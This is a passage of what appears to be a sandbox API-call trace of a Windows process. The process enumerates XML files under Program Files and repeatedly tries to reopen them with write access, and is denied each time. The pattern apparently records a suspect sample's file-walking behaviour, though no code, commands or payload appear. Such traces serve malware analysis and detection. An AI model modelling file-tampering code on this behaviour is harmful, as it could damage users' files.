shared\\ink\\fsdefinitions\\oskclearui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.506] GetLastError () returned 0x5 [0083.506] GetLastError () returned 0x5 [0083.506] SetLastError (dwErrCode=0x5) [0083.507] GetLastError () returned 0x5 [0083.507] SetLastError (dwErrCode=0x5) [0083.507] GetLastError () returned 0x5 [0083.507] SetLastError (dwErrCode=0x5) [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0083.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.507] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0083.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.507] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x784d0 [0083.743] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.743] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskclearuibase.xml", cAlternateFileName="")) returned 1 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0083.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x51398 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0083.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0083.744] AreFileApisANSI () returned 1 [0083.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml", lpUsedDefaultChar=0x0) returned 95 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0083.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.745] AreFileApisANSI () returned 1 [0083.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0083.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x80a30 [0083.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 95 [0083.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.746] GetFileType (hFile=0x340) returned 0x1 [0083.746] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.746] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.746] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.746] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.746] CloseHandle (hObject=0x340) returned 1 [0083.749] AreFileApisANSI () returned 1 [0083.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0083.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x80a30 [0083.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 95 [0083.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.749] GetLastError () returned 0x5 [0083.749] GetLastError () returned 0x5 [0083.749] SetLastError (dwErrCode=0x5) [0083.749] GetLastError () returned 0x5 [0083.749] SetLastError (dwErrCode=0x5) [0083.749] GetLastError () returned 0x5 [0083.749] SetLastError (dwErrCode=0x5) [0083.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0083.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0083.750] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.750] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.750] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xbc, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x513a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xbc, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ˡ")) returned 0 [0083.750] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.750] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.751] AreFileApisANSI () returned 1 [0083.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml", lpUsedDefaultChar=0x0) returned 80 [0083.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0083.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.751] AreFileApisANSI () returned 1 [0083.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0083.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 80 [0083.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.751] GetFileType (hFile=0x42c) returned 0x1 [0083.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.752] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.752] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.752] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.752] CloseHandle (hObject=0x42c) returned 1 [0083.752] AreFileApisANSI () returned 1 [0083.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0083.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml") returned 80 [0083.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.752] GetLastError () returned 0x5 [0083.752] GetLastError () returned 0x5 [0083.752] SetLastError (dwErrCode=0x5) [0083.752] GetLastError () returned 0x5 [0083.753] SetLastError (dwErrCode=0x5) [0083.753] GetLastError () returned 0x5 [0083.753] SetLastError (dwErrCode=0x5) [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce328, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oskmenu", cAlternateFileName="")) returned 1 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0083.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.753] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 